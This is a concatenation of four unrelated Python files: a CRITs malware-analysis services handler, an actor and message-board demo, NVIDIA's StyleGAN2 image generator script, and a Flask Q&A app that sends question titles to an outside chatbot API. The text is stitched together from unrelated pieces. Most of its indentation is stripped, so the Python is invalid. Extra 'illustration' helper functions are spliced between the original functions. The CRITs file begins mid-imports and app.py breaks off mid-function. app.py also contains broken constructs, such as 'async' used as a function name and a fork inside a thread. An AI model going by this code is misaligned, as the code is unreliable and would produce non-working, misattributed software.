from crits.core.class_mapper import class_from_type, class_from_id
from crits.core.crits_mongoengine import json_handler
from crits.core.handlers import build_jtable, csv_export
from crits.core.handlers import jtable_ajax_list, jtable_ajax_delete
from crits.core.user_tools import user_sources
from crits.services.analysis_result import AnalysisResult, AnalysisConfig
from crits.services.analysis_result import EmbeddedAnalysisResultLog
from crits.services.core import ServiceConfigError, AnalysisTask
from crits.services.service import CRITsService
logger = logging.getLogger(__name__)
def generate_analysis_results_csv(request):
"""
Generate a CSV file of the Analysis Results information
:param request: The request for this CSV.
:type request: :class:`django.http.HttpRequest`
:returns: :class:`django.http.HttpResponse`
"""
response = csv_export(request,AnalysisResult)
return response
def generate_analysis_results_jtable(request, option):
"""
Generate the jtable data for rendering in the list template.
:param request: The request for this jtable.
:type request: :class:`django.http.HttpRequest`
:param option: Action to take.
:type option: str of either 'jtlist', 'jtdelete', or 'inline'.
:returns: :class:`django.http.HttpResponse`
"""
obj_type = AnalysisResult
type_ = "analysis_result"
mapper = obj_type._meta['jtable_opts']
if option == "jtlist":
# Sets display url
details_url = mapper['details_url']
details_url_key = mapper['details_url_key']
fields = mapper['fields']
response = jtable_ajax_list(obj_type,
details_url,
details_url_key,
request,
includes=fields)
return HttpResponse(json.dumps(response,
default=json_handler),
content_type="application/json")
if option == "jtdelete":
response = {"Result": "ERROR"}
if jtable_ajax_delete(obj_type,request):
response = {"Result": "OK"}
return HttpResponse(json.dumps(response,
default=json_handler),
content_type="application/json")
jtopts = {
'title': "Analysis Results",
'default_sort': mapper['default_sort'],
'listurl': reverse('crits.services.views.%ss_listing' % type_,
args=('jtlist',)),
'deleteurl': reverse('crits.services.views.%ss_listing' % type_,
args=('jtdelete',)),
'searchurl': reverse(mapper['searchurl']),
'fields': mapper['jtopts_fields'],
'hidden_fields': mapper['hidden_fields'],
'linked_fields': mapper['linked_fields'],
'details_link': mapper['details_link'],
'no_sort': mapper['no_sort']
}
jtable = build_jtable(jtopts,request)
jtable['toolbar'] = [
]
if option == "inline":
return render_to_response("jtable.html",
{'jtable': jtable,
'jtid': '%s_listing' % type_,
'button' : '%ss_tab' % type_},
RequestContext(request))
else:
return render_to_response("%s_listing.html" % type_,
{'jtable': jtable,
'jtid': '%s_listing' % type_},
RequestContext(request))
def service_work_handler(service_instance, final_config):
"""
Handles a unit of work for a service by calling the service's "execute"
    method. This function is generally called by processes/threads. A
    module-level function is also needed because it is picklable, whereas
    passing in service_instance.execute would not be, since it is a bound
    instance method.
    :param service_instance: The service instance that the work will be performed in
    :type service_instance: crits.services.core.Service
    :param final_config: The service's configuration settings
    :type final_config: dict
"""
service_instance.execute(final_config)
def run_service(name, type_, id_, user, obj=None,
execute='local', custom_config={}, **kwargs):
"""
Run a service.
:param name: The name of the service to run.
:type name: str
:param type_: The type of the object.
:type type_: str
:param id_: The identifier of the object.
:type id_: str
:param user: The user running the service.
:type user: str
:param obj: The CRITs object, if given this overrides crits_type and identifier.
:type obj: CRITs object.
:param analyst: The user updating the results.
:type analyst: str
:param execute: The execution type.
:type execute: str
:param custom_config: Use a custom configuration for this run.
:type custom_config: dict
"""
result = {'success': False}
if type_ not in settings.CRITS_TYPES:
result['html'] = "Unknown CRITs type."
return result
if name not in enabled_services():
result['html'] = "Service %s is unknown or not enabled." % name
return result
service_class = crits.services.manager.get_service_class(name)
if not service_class:
result['html'] = "Unable to get service class."
return result
if not obj:
obj = class_from_id(type_, id_)
if not obj:
result['html'] = 'Could not find object.'
return result
service = CRITsService.objects(name=name).first()
if not service:
result['html'] = "Unable to find service in database."
return result
# See if the object is a supported type for the service.
if not service_class.supported_for_type(type_):
result['html'] = "Service not supported for type '%s'" % type_
return result
# When running in threaded mode, each thread needs to have its own copy of
# the object. If we do not do this then one thread may read() from the
    # object (to get the binary) and then the second would read() without
# knowing and get undefined behavior as the file pointer would be who knows
# where. By giving each thread a local copy they can operate independently.
#
# When not running in thread mode this has no effect except wasted memory.
local_obj = local()
local_obj.obj = copy.deepcopy(obj)
# Give the service a chance to check for required fields.
try:
service_class.valid_for(local_obj.obj)
if hasattr(local_obj.obj, 'filedata'):
if local_obj.obj.filedata.grid_id:
# Reset back to the start so the service gets the full file.
local_obj.obj.filedata.seek(0)
except ServiceConfigError as e:
result['html'] = str(e)
return result
# Get the config from the database and validate the submitted options
# exist.
db_config = service.config.to_dict()
try:
service_class.validate_runtime(custom_config, db_config)
except ServiceConfigError as e:
result['html'] = str(e)
return result
final_config = db_config
# Merge the submitted config with the one from the database.
# This is because not all config options may be submitted.
final_config.update(custom_config)
form = service_class.bind_runtime_form(user, final_config)
if form:
if not form.is_valid():
# TODO: return corrected form via AJAX
result['html'] = str(form.errors)
return result
# If the form is valid, create the config using the cleaned data.
final_config = db_config
final_config.update(form.cleaned_data)
logger.info("Running %s on %s, execute=%s" % (name, local_obj.obj.id, execute))
service_instance = service_class(notify=update_analysis_results,
complete=finish_task)
# Give the service a chance to modify the config that gets saved to the DB.
saved_config = dict(final_config)
service_class.save_runtime_config(saved_config)
task = AnalysisTask(local_obj.obj, service_instance, user)
task.config = AnalysisConfig(**saved_config)
task.start()
add_task(task)
service_instance.set_task(task)
if execute == 'process':
p = Process(target=service_instance.execute, args=(final_config,))
p.start()
elif execute == 'thread':
t = Thread(target=service_instance.execute, args=(final_config,))
t.start()
elif execute == 'process_pool':
if __service_process_pool__ is not None and service.compatability_mode != True:
__service_process_pool__.apply_async(func=service_work_handler,
args=(service_instance, final_config,))
else:
logger.warning("Could not run %s on %s, execute=%s, running in process mode" % (name, local_obj.obj.id, execute))
p = Process(target=service_instance.execute, args=(final_config,))
p.start()
elif execute == 'thread_pool':
if __service_thread_pool__ is not None and service.compatability_mode != True:
__service_thread_pool__.apply_async(func=service_work_handler,
args=(service_instance, final_config,))
else:
logger.warning("Could not run %s on %s, execute=%s, running in thread mode" % (name, local_obj.obj.id, execute))
t = Thread(target=service_instance.execute, args=(final_config,))
t.start()
elif execute == 'local':
service_instance.execute(final_config)
# Return after starting thread so web request can complete.
result['success'] = True
return result
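# --- Hedged illustration (not part of CRITs): the threading.local() + deepcopy pattern
# used in run_service() above, reduced to a self-contained sketch. Each worker gets its
# own copy of a shared object so concurrent read()/seek() calls cannot interfere. The
# FakeSample class and its data are made up for the example.
def _demo_threadlocal_copies():
    import copy
    from threading import Thread, local

    class FakeSample(object):
        """Stands in for a TLO with a seekable binary payload (hypothetical)."""
        def __init__(self, data):
            self.data = data
            self.pos = 0
        def read(self):
            chunk = self.data[self.pos:]
            self.pos = len(self.data)
            return chunk
        def seek(self, pos):
            self.pos = pos

    shared = FakeSample(b"binary sample data")

    def worker():
        ctx = local()
        ctx.obj = copy.deepcopy(shared)   # private copy: its file position is independent
        ctx.obj.seek(0)
        assert ctx.obj.read() == b"binary sample data"

    threads = [Thread(target=worker) for _ in range(4)]
    for t in threads:
        t.start()
    for t in threads:
        t.join()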
def add_task(task):
"""
Add a new task.
"""
logger.debug("Adding task %s" % task)
insert_analysis_results(task)
def run_triage(obj, user):
"""
Run all services marked as triage against this top-level object.
:param obj: The CRITs top-level object class.
:type obj: Class which inherits from
:class:`crits.core.crits_mongoengine.CritsBaseAttributes`
:param user: The user requesting the services to be run.
:type user: str
"""
services = triage_services()
for service_name in services:
try:
run_service(service_name,
obj._meta['crits_type'],
obj.id,
user,
obj=obj,
execute=settings.SERVICE_MODEL,
custom_config={})
except:
pass
return
def add_result(object_type, object_id, analysis_id, result, type_, subtype,
analyst):
"""
add_results wrapper for a single result.
:param object_type: The top-level object type.
:type object_type: str
:param object_id: The ObjectId to search for.
:type object_id: str
:param analysis_id: The ID of the task to update.
:type analysis_id: str
:param result: The result to append.
:type result: str
:param type_: The result type.
:type type_: str
:param subtype: The result subtype.
:type subtype: str
:param analyst: The user updating the results.
:type analyst: str
:returns: dict with keys "success" (boolean) and "message" (str) if failed.
"""
return add_results(object_type, object_id, analysis_id, [result], [type_],
[subtype], analyst)
def add_results(object_type, object_id, analysis_id, result, type_, subtype,
analyst):
"""
Add multiple results to an analysis task.
:param object_type: The top-level object type.
:type object_type: str
:param object_id: The ObjectId to search for.
:type object_id: str
:param analysis_id: The ID of the task to update.
:type analysis_id: str
    :param result: The list of results to append.
:type result: list of str
:param type_: The list of result types.
:type type_: list of str
:param subtype: The list of result subtypes.
:type subtype: list of str
:param analyst: The user updating the results.
:type analyst: str
:returns: dict with keys "success" (boolean) and "message" (str) if failed.
"""
res = {'success': False}
if not object_type or not object_id or not analysis_id:
res['message'] = "Must supply object id/type and analysis id."
return res
# Validate user can add service results to this TLO.
klass = class_from_type(object_type)
sources = user_sources(analyst)
obj = klass.objects(id=object_id, source__name__in=sources).first()
if not obj:
res['message'] = "Could not find object to add results to."
return res
if not(result and type_ and subtype):
res['message'] = "Need a result, type, and subtype to add a result."
return res
if not(len(result) == len(type_) == len(subtype)):
res['message'] = "result, type, and subtype need to be the same length."
return res
# Update analysis results
final_list = []
for key, r in enumerate(result):
final = {}
final['subtype'] = subtype[key]
final['result'] = r
tmp = ast.literal_eval(type_[key])
for k in tmp:
final[k] = tmp[k]
final_list.append(final)
ar = AnalysisResult.objects(analysis_id=analysis_id).first()
if ar:
AnalysisResult.objects(id=ar.id).update_one(push_all__results=final_list)
res['success'] = True
return res
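# --- Hedged illustration (not part of CRITs): how add_results() above flattens its
# parallel lists. Each element of type_ is a string that ast.literal_eval() turns into a
# dict whose keys are merged into the stored entry. The sample values are hypothetical.
def _demo_build_result_entries(result, type_, subtype):
    import ast
    entries = []
    for key, r in enumerate(result):
        entry = {'subtype': subtype[key], 'result': r}
        entry.update(ast.literal_eval(type_[key]))  # type_ strings are literal dicts
        entries.append(entry)
    return entries
# e.g. _demo_build_result_entries(['93.184.216.34'], ["{'type': 'ip'}"], ['A record'])
# -> [{'subtype': 'A record', 'result': '93.184.216.34', 'type': 'ip'}]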
def add_log(object_type, object_id, analysis_id, log_message, level, analyst):
"""
Add a log entry to an analysis task.
:param object_type: The top-level object type.
:type object_type: str
:param object_id: The ObjectId to search for.
:type object_id: str
:param analysis_id: The ID of the task to update.
:type analysis_id: str
:param log_message: The log entry to append.
:type log_message: dict
:param level: The log level.
:type level: str
:param analyst: The user updating the log.
:type analyst: str
:returns: dict with keys "success" (boolean) and "message" (str) if failed.
"""
results = {'success': False}
if not object_type or not object_id or not analysis_id:
results['message'] = "Must supply object id/type and analysis id."
return results
# Validate user can add service results to this TLO.
klass = class_from_type(object_type)
sources = user_sources(analyst)
obj = klass.objects(id=object_id, source__name__in=sources).first()
if not obj:
results['message'] = "Could not find object to add results to."
return results
# Update analysis log
le = EmbeddedAnalysisResultLog()
le.message = log_message
le.level = level
le.datetime = str(datetime.datetime.now())
ar = AnalysisResult.objects(analysis_id=analysis_id).first()
if ar:
AnalysisResult.objects(id=ar.id).update_one(push__log=le)
results['success'] = True
else:
results['message'] = "Could not find task to add log to."
return results
def finish_task(object_type, object_id, analysis_id, status, analyst):
"""
Finish a task by setting its status to "completed" and setting the finish
date.
:param object_type: The top-level object type.
:type object_type: str
:param object_id: The ObjectId to search for.
:type object_id: str
:param analysis_id: The ID of the task to update.
:type analysis_id: str
:param status: The status of the task.
:type status: str ("error", "completed")
:param analyst: The user updating the log.
:type analyst: str
:returns: dict with keys "success" (boolean) and "message" (str) if failed.
"""
results = {'success': False}
if not status:
status = "completed"
if status not in ('error', 'completed'):
status = "completed"
if not object_type or not object_id or not analysis_id:
results['message'] = "Must supply object id/type and analysis id."
return results
# Validate user can add service results to this TLO.
klass = class_from_type(object_type)
sources = user_sources(analyst)
obj = klass.objects(id=object_id, source__name__in=sources).first()
if not obj:
results['message'] = "Could not find object to add results to."
return results
# Update analysis log
date = str(datetime.datetime.now())
ar = AnalysisResult.objects(analysis_id=analysis_id).first()
if ar:
AnalysisResult.objects(id=ar.id).update_one(set__status=status,
set__finish_date=date)
results['success'] = True
return results
def update_config(service_name, config, analyst):
"""
Update the configuration for a service.
"""
service = CRITsService.objects(name=service_name).first()
service.config = AnalysisConfig(**config)
try:
#TODO: get/validate the config from service author to set status
#update_status(service_name)
service.save(username=analyst)
return {'success': True}
    except ValidationError as e:
return {'success': False, 'message': e}
def get_service_config(name):
status = {'success': False}
service = CRITsService.objects(name=name, status__ne="unavailable").first()
if not service:
status['error'] = 'Service "%s" is unavailable. Please review error logs.' % name
return status
config = service.config.to_dict()
service_class = crits.services.manager.get_service_class(name)
if not service_class:
        status['error'] = 'Service "%s" is unavailable. Please review error logs.' % name
return status
display_config = service_class.get_config_details(config)
status['config'] = display_config
status['config_error'] = _get_config_error(service)
# TODO: fix code so we don't have to do this
status['service'] = service.to_dict()
status['success'] = True
return status
def _get_config_error(service):
"""
Return a string describing the error in the service configuration.
Returns None if there are no errors.
"""
error = None
name = service['name']
config = service['config']
if service['status'] == 'misconfigured':
service_class = crits.services.manager.get_service_class(name)
try:
service_class.parse_config(config.to_dict())
except Exception as e:
error = str(e)
return error
def do_edit_config(name, analyst, post_data=None):
status = {'success': False}
service = CRITsService.objects(name=name, status__ne="unavailable").first()
if not service:
status['config_error'] = 'Service "%s" is unavailable. Please review error logs.' % name
status['form'] = ''
status['service'] = ''
return status
# Get the class that implements this service.
service_class = crits.services.manager.get_service_class(name)
config = service.config.to_dict()
cfg_form, html = service_class.generate_config_form(config)
# This isn't a form object. It's the HTML.
status['form'] = html
status['service'] = service
if post_data:
#Populate the form with values from the POST request
form = cfg_form(post_data)
if form.is_valid():
try:
service_class.parse_config(form.cleaned_data)
except ServiceConfigError as e:
service.status = 'misconfigured'
service.save()
status['config_error'] = str(e)
return status
result = update_config(name, form.cleaned_data, analyst)
if not result['success']:
return status
service.status = 'available'
service.save()
else:
status['config_error'] = form.errors
return status
status['success'] = True
return status
def get_config(service_name):
"""
Get the configuration for a service.
"""
service = CRITsService.objects(name=service_name).first()
if not service:
return None
return service.config
def set_enabled(service_name, enabled=True, analyst=None):
"""
Enable/disable a service in CRITs.
"""
if enabled:
logger.info("Enabling: %s" % service_name)
else:
logger.info("Disabling: %s" % service_name)
service = CRITsService.objects(name=service_name).first()
service.enabled = enabled
try:
service.save(username=analyst)
if enabled:
url = reverse('crits.services.views.disable', args=(service_name,))
else:
url = reverse('crits.services.views.enable', args=(service_name,))
return {'success': True, 'url': url}
    except ValidationError as e:
return {'success': False, 'message': e}
def set_triage(service_name, enabled=True, analyst=None):
"""
Enable/disable a service for running on triage (upload).
"""
if enabled:
logger.info("Enabling triage: %s" % service_name)
else:
logger.info("Disabling triage: %s" % service_name)
service = CRITsService.objects(name=service_name).first()
service.run_on_triage = enabled
try:
service.save(username=analyst)
if enabled:
url = reverse('crits.services.views.disable_triage',
args=(service_name,))
else:
url = reverse('crits.services.views.enable_triage',
args=(service_name,))
return {'success': True, 'url': url}
    except ValidationError as e:
return {'success': False,
'message': e}
def enabled_services(status=True):
"""
Return names of services which are enabled.
"""
if status:
services = CRITsService.objects(enabled=True,
status="available")
else:
services = CRITsService.objects(enabled=True)
return [s.name for s in services]
def get_supported_services(crits_type):
"""
Get the supported services for a type.
"""
services = CRITsService.objects(enabled=True)
for s in sorted(services, key=lambda s: s.name.lower()):
if s.supported_types == 'all' or crits_type in s.supported_types:
yield s.name
def triage_services(status=True):
"""
Return names of services set to run on triage.
"""
if status:
services = CRITsService.objects(run_on_triage=True,
status="available")
else:
services = CRITsService.objects(run_on_triage=True)
return [s.name for s in services]
def delete_analysis(task_id, analyst):
"""
Delete analysis results.
"""
ar = AnalysisResult.objects(id=task_id).first()
if ar:
ar.delete(username=analyst)
def insert_analysis_results(task):
"""
Insert analysis results for this task.
"""
ar = AnalysisResult()
tdict = task.to_dict()
tdict['analysis_id'] = tdict['id']
del tdict['id']
ar.merge(arg_dict=tdict)
ar.save()
def update_analysis_results(task):
"""
Update analysis results for this task.
"""
# If the task does not currently exist for the given sample in the
# database, add it.
found = False
ar = AnalysisResult.objects(analysis_id=task.task_id).first()
if ar:
found = True
if not found:
logger.warning("Tried to update a task that didn't exist.")
insert_analysis_results(task)
else:
# Otherwise, update it.
tdict = task.to_dict()
tdict['analysis_id'] = tdict['id']
del tdict['id']
#TODO: find a better way to do this.
new_dict = {}
        for k in tdict:
new_dict['set__%s' % k] = tdict[k]
try:
AnalysisResult.objects(id=ar.id).update_one(**new_dict)
except Exception as e: # assume bad data in 'results'
task.status = 'error'
new_dict['set__results'] = []
le = EmbeddedAnalysisResultLog()
le.message = 'DB Update Failed: %s' % e
le.level = 'error'
le.datetime = str(datetime.datetime.now())
new_dict['set__log'].append(le)
try:
AnalysisResult.objects(id=ar.id).update_one(**new_dict)
except: # don't know what's wrong, try writing basic log only
AnalysisResult.objects(id=ar.id).update_one(set__log=[le])
# The service pools need to be defined down here because the functions
# that are used by the services must already be defined.
if settings.SERVICE_MODEL == 'thread_pool':
__service_thread_pool__ = ThreadPool(processes=settings.SERVICE_POOL_SIZE)
__service_process_pool__ = None
elif settings.SERVICE_MODEL == 'process_pool':
__service_thread_pool__ = None
__service_process_pool__ = Pool(processes=settings.SERVICE_POOL_SIZE)
else:
__service_thread_pool__ = None
__service_process_pool__ = None
|
main.py
|
import inspect

from message_board import MSGBoard
from node import Actor
def foo(bar, baz, nay):
return bar + baz + nay
def bar():
return 3
def baz():
return 30
def kay():
return 300
def jay():
return 3000
def nay(kay, jay):
return kay + jay
def show(foo):
print(foo)
return True
def shutdown():
import sys
print('shutting down')
sys.exit()
exit()
def get_actor():
frame_infos = inspect.stack() # A list of FrameInfo.
frame = frame_infos[1].frame # The frame of the caller.
locs = frame.f_locals # The caller's locals dict.
return locs['self']
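# --- Hedged illustration: how the frame inspection in get_actor() above recovers the
# calling object. A minimal self-contained sketch with a made-up stand-in class:
def _demo_get_caller_self():
    import inspect
    def who_called_me():
        caller_locals = inspect.stack()[1].frame.f_locals  # locals of the calling frame
        return caller_locals.get('self')
    class Widget(object):
        def identify(self):
            return who_called_me()
    w = Widget()
    assert w.identify() is w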
def change_msg_board(get_actor, get_second_msg_board):
get_actor.set_messageboard(get_second_msg_board.name)
def get_second_msg_board(get_actor):
return get_actor.msgboards[1]
def print_something(get_second_msg_board):
print(get_second_msg_board.name)
return get_second_msg_board
# def user_input():
# import threading
# import time
# import sys
#
# def background():
# while True:
# time.sleep(3)
# print('disarm me by typing disarm')
#
#
# def show_trigger():
# .msgboards.append(msgboard)
#
# new_id = thoughts.produce_id()
# message = {'id': new_id, 'ref_id': new_id, 'request': 'show'}
# actor_user.say(message, thoughts)
#
# # now threading1 runs regardless of user input
# threading1 = threading.Thread(target=background)
# threading1.daemon = True
# threading1.start()
#
# while True:
# if input() == 'disarm':
# show_trigger()
# sys.exit()
# else:
# print('not disarmed')
# these function details could be deduced from their signature instead of made explicit...
actor_foo = Actor(verbose=True)
actor_kay = Actor(verbose=True)
actor_user = Actor(accepts_user_input=True, verbose=True)
thoughts = MSGBoard('thoughts')
words = MSGBoard('words')
actor_foo.listen(thoughts)
actor_kay.listen(thoughts)
actor_user.listen(thoughts)
actor_user.add_functions(functions=[show, shutdown])
actor_foo.add_functions(functions=[foo, baz, shutdown])
actor_kay.add_functions(functions=[bar, kay, jay, nay, shutdown])
actor_foo.add_trigger(cause='show', effect='foo')
|
run_generator.py
|
# Copyright (c) 2019, NVIDIA Corporation. All rights reserved.
#
# This work is made available under the Nvidia Source Code License-NC.
# To view a copy of this license, visit
# https://nvlabs.github.io/stylegan2/license.html
import argparse
import numpy as np
import PIL.Image
import dnnlib
import dnnlib.tflib as tflib
import re
import sys
from multiprocessing import cpu_count
from queue import Queue
from io import BytesIO
from threading import Thread
import pretrained_networks
#----------------------------------------------------------------------------
NUM_THREADS = cpu_count()
# ----------------------------------------------------------------------------
def generate_images(network_pkl, seeds, truncation_psi):
    # The queues and worker functions are defined locally because `generate_images` itself runs on another thread
image_queue = Queue(maxsize=100)
io_queue = Queue(maxsize=100)
# Thread function: convert image data into image buffer
def T_parse_image():
while True:
item = image_queue.get()
if item is None:
io_queue.put(None)
break
else:
im, path = item
im = PIL.Image.fromarray(im, 'RGB')
io = BytesIO()
im.save(io, format='png')
io_queue.put((io, path))
# Thread function: save image buffer into file
    # It's better to do IO work in one thread, especially when it's on an HDD
def T_save_image():
none_cnt = 0
while True:
item = io_queue.get()
if item is None:
none_cnt += 1
if none_cnt == NUM_THREADS:
break
else:
io, path = item
print(path)
with open(path, 'wb') as f:
f.write(io.getvalue())
io.close()
# Create image saver threads
print('Create', NUM_THREADS, 'threads')
image_threads = []
for i in range(NUM_THREADS):
t = Thread(target=T_parse_image, name=f'ImageSaver_{i}', daemon=True)
image_threads.append(t)
t.start()
io_thread = Thread(target=T_save_image, name='ThreadImageSaver', daemon=True)
io_thread.start()
print('Loading networks from "%s"...' % network_pkl)
_G, _D, Gs = pretrained_networks.load_networks(network_pkl)
noise_vars = [var for name, var in Gs.components.synthesis.vars.items() if name.startswith('noise')]
Gs_kwargs = dnnlib.EasyDict()
Gs_kwargs.output_transform = dict(func=tflib.convert_images_to_uint8, nchw_to_nhwc=True)
Gs_kwargs.randomize_noise = False
if truncation_psi is not None:
Gs_kwargs.truncation_psi = truncation_psi
for seed_idx, seed in enumerate(seeds):
rnd = np.random.RandomState(seed)
z = rnd.randn(1, *Gs.input_shape[1:]) # [minibatch, component]
tflib.set_vars({var: rnd.randn(*var.shape.as_list()) for var in noise_vars}) # [height, width]
images = Gs.run(z, None, **Gs_kwargs) # [minibatch, height, width, channel]
filepath = dnnlib.make_run_dir_path('seed%06d.png' % seed)
image_queue.put((images[0], filepath))
# Close threads
for _ in range(NUM_THREADS):
image_queue.put(None)
for t in image_threads:
t.join()
io_thread.join()
print('done')
#----------------------------------------------------------------------------
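# --- Hedged example (not part of StyleGAN2): the producer/consumer pattern used in
# generate_images() above, reduced to a self-contained sketch. One sentinel (None) per
# worker tells the single writer to stop, mirroring T_parse_image/T_save_image.
def _demo_queue_pipeline(items, num_workers=4):
    from queue import Queue
    from threading import Thread

    work_q, out_q = Queue(maxsize=100), Queue(maxsize=100)

    def worker():
        while True:
            item = work_q.get()
            if item is None:
                out_q.put(None)        # forward the sentinel to the writer
                break
            out_q.put(item * 2)        # stand-in for the PNG encoding step

    def writer(results):
        seen_sentinels = 0
        while seen_sentinels < num_workers:
            item = out_q.get()
            if item is None:
                seen_sentinels += 1
            else:
                results.append(item)   # stand-in for the file write

    results = []
    workers = [Thread(target=worker, daemon=True) for _ in range(num_workers)]
    for t in workers:
        t.start()
    writer_thread = Thread(target=writer, args=(results,), daemon=True)
    writer_thread.start()
    for item in items:
        work_q.put(item)
    for _ in range(num_workers):
        work_q.put(None)               # one sentinel per worker
    for t in workers:
        t.join()
    writer_thread.join()
    return results
#----------------------------------------------------------------------------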
def style_mixing_example(network_pkl, row_seeds, col_seeds, truncation_psi, col_styles, minibatch_size=4):
print('Loading networks from "%s"...' % network_pkl)
_G, _D, Gs = pretrained_networks.load_networks(network_pkl)
w_avg = Gs.get_var('dlatent_avg') # [component]
Gs_syn_kwargs = dnnlib.EasyDict()
Gs_syn_kwargs.output_transform = dict(func=tflib.convert_images_to_uint8, nchw_to_nhwc=True)
Gs_syn_kwargs.randomize_noise = False
Gs_syn_kwargs.minibatch_size = minibatch_size
print('Generating W vectors...')
all_seeds = list(set(row_seeds + col_seeds))
all_z = np.stack([np.random.RandomState(seed).randn(*Gs.input_shape[1:]) for seed in all_seeds]) # [minibatch, component]
all_w = Gs.components.mapping.run(all_z, None) # [minibatch, layer, component]
all_w = w_avg + (all_w - w_avg) * truncation_psi # [minibatch, layer, component]
w_dict = {seed: w for seed, w in zip(all_seeds, list(all_w))} # [layer, component]
print('Generating images...')
all_images = Gs.components.synthesis.run(all_w, **Gs_syn_kwargs) # [minibatch, height, width, channel]
image_dict = {(seed, seed): image for seed, image in zip(all_seeds, list(all_images))}
print('Generating style-mixed images...')
for row_seed in row_seeds:
for col_seed in col_seeds:
w = w_dict[row_seed].copy()
w[col_styles] = w_dict[col_seed][col_styles]
image = Gs.components.synthesis.run(w[np.newaxis], **Gs_syn_kwargs)[0]
image_dict[(row_seed, col_seed)] = image
print('Saving images...')
for (row_seed, col_seed), image in image_dict.items():
PIL.Image.fromarray(image, 'RGB').save(dnnlib.make_run_dir_path('%d-%d.png' % (row_seed, col_seed)))
print('Saving image grid...')
_N, _C, H, W = Gs.output_shape
canvas = PIL.Image.new('RGB', (W * (len(col_seeds) + 1), H * (len(row_seeds) + 1)), 'black')
for row_idx, row_seed in enumerate([None] + row_seeds):
for col_idx, col_seed in enumerate([None] + col_seeds):
if row_seed is None and col_seed is None:
continue
key = (row_seed, col_seed)
if row_seed is None:
key = (col_seed, col_seed)
if col_seed is None:
key = (row_seed, row_seed)
canvas.paste(PIL.Image.fromarray(image_dict[key], 'RGB'), (W * col_idx, H * row_idx))
canvas.save(dnnlib.make_run_dir_path('grid.png'))
#----------------------------------------------------------------------------
def _parse_num_range(s):
'''Accept either a comma separated list of numbers 'a,b,c' or a range 'a-c' and return as a list of ints.'''
range_re = re.compile(r'^(\d+)-(\d+)$')
m = range_re.match(s)
if m:
return list(range(int(m.group(1)), int(m.group(2))+1))
vals = s.split(',')
return [int(x) for x in vals]
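# Hedged usage note (illustration only):
#   _parse_num_range('1-4')            -> [1, 2, 3, 4]
#   _parse_num_range('6600,6601,6625') -> [6600, 6601, 6625]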
#----------------------------------------------------------------------------
_examples = '''examples:
# Generate ffhq uncurated images (matches paper Figure 12)
python %(prog)s generate-images --network=gdrive:networks/stylegan2-ffhq-config-f.pkl --seeds=6600-6625 --truncation-psi=0.5
# Generate ffhq curated images (matches paper Figure 11)
python %(prog)s generate-images --network=gdrive:networks/stylegan2-ffhq-config-f.pkl --seeds=66,230,389,1518 --truncation-psi=1.0
# Generate uncurated car images (matches paper Figure 12)
python %(prog)s generate-images --network=gdrive:networks/stylegan2-car-config-f.pkl --seeds=6000-6025 --truncation-psi=0.5
# Generate style mixing example (matches style mixing video clip)
python %(prog)s style-mixing-example --network=gdrive:networks/stylegan2-ffhq-config-f.pkl --row-seeds=85,100,75,458,1500 --col-seeds=55,821,1789,293 --truncation-psi=1.0
'''
#----------------------------------------------------------------------------
def main():
parser = argparse.ArgumentParser(
description='''StyleGAN2 generator.
Run 'python %(prog)s <subcommand> --help' for subcommand help.''',
epilog=_examples,
formatter_class=argparse.RawDescriptionHelpFormatter
)
subparsers = parser.add_subparsers(help='Sub-commands', dest='command')
parser_generate_images = subparsers.add_parser('generate-images', help='Generate images')
parser_generate_images.add_argument('--network', help='Network pickle filename', dest='network_pkl', required=True)
parser_generate_images.add_argument('--seeds', type=_parse_num_range, help='List of random seeds', required=True)
parser_generate_images.add_argument('--truncation-psi', type=float, help='Truncation psi (default: %(default)s)', default=0.5)
parser_generate_images.add_argument('--result-dir', help='Root directory for run results (default: %(default)s)', default='results', metavar='DIR')
parser_style_mixing_example = subparsers.add_parser('style-mixing-example', help='Generate style mixing video')
parser_style_mixing_example.add_argument('--network', help='Network pickle filename', dest='network_pkl', required=True)
parser_style_mixing_example.add_argument('--row-seeds', type=_parse_num_range, help='Random seeds to use for image rows', required=True)
parser_style_mixing_example.add_argument('--col-seeds', type=_parse_num_range, help='Random seeds to use for image columns', required=True)
parser_style_mixing_example.add_argument('--col-styles', type=_parse_num_range, help='Style layer range (default: %(default)s)', default='0-6')
parser_style_mixing_example.add_argument('--truncation-psi', type=float, help='Truncation psi (default: %(default)s)', default=0.5)
parser_style_mixing_example.add_argument('--result-dir', help='Root directory for run results (default: %(default)s)', default='results', metavar='DIR')
args = parser.parse_args()
kwargs = vars(args)
subcmd = kwargs.pop('command')
if subcmd is None:
print ('Error: missing subcommand. Re-run with --help for usage.')
sys.exit(1)
sc = dnnlib.SubmitConfig()
sc.num_gpus = 1
sc.submit_target = dnnlib.SubmitTarget.LOCAL
sc.local.do_not_copy_source_files = True
sc.run_dir_root = kwargs.pop('result_dir')
sc.run_desc = subcmd
func_name_map = {
'generate-images': 'run_generator.generate_images',
'style-mixing-example': 'run_generator.style_mixing_example'
}
dnnlib.submit_run(sc, func_name_map[subcmd], **kwargs)
#----------------------------------------------------------------------------
if __name__ == "__main__":
main()
#----------------------------------------------------------------------------
|
app.py
|
#encoding: utf-8
from flask import Flask
from exts import db
import flask
import config
from forms import RegistForm
from models import UserModel,QuestionModel,AnswerModel
from decorators import login_required
from sqlalchemy import or_
import json,requests
import os
from threading import Thread
def async(f):
def wrapper(*args, **kwargs):
thr = Thread(target = f, args = args, kwargs = kwargs)
thr.start()
return wrapper
@async
def autoRobotAnswer(id, question_model):
pid = os.fork()
if pid != 0:
return
url = "http://47.104.98.154:8080/anonymous/wordManage/wenda"
headers = {'content-type': "application/json"}
query_string = {"question": question_model.title, "robotid": "1791"}
if (len(question_model.answers) < 1):
response = requests.post(url, data=json.dumps(query_string), headers=headers)
        jstr = json.loads(response.text)  # parse the JSON body so the fields below can be indexed
# error : {"result":false,"message":"服务器处理异常!","data":null}
print jstr
if (jstr['message'] == 'success'):
print jstr['message']
question_id = id
print question_id
content = jstr['data']['answers']
print content
answer_model = AnswerModel(content=content)
answer_model.author = 'robot'
answer_model.question = question_model
db.session.add(answer_model)
db.session.commit()
app = Flask(__name__)
app.config.from_object(config)
db.init_app(app)
@app.route('/')
def index():
context = {
'questions': QuestionModel.query.all()
}
return flask.render_template('index.html',**context)
@app.route('/question/',methods=['GET','POST'])
@login_required
def question():
if flask.request.method == 'GET':
return flask.render_template('question.html')
else:
title = flask.request.form.get('title')
content = flask.request.form.get('content')
question_model = QuestionModel(title=title,content=content)
question_model.author = flask.g.user
db.session.add(question_model)
db.session.commit()
return flask.redirect(flask.url_for('index'))
@app.route('/d/<id>/')
def detail(id):
question_model = QuestionModel.query.get(id)
    # add autobot
autoRobotAnswer(id, question_model)
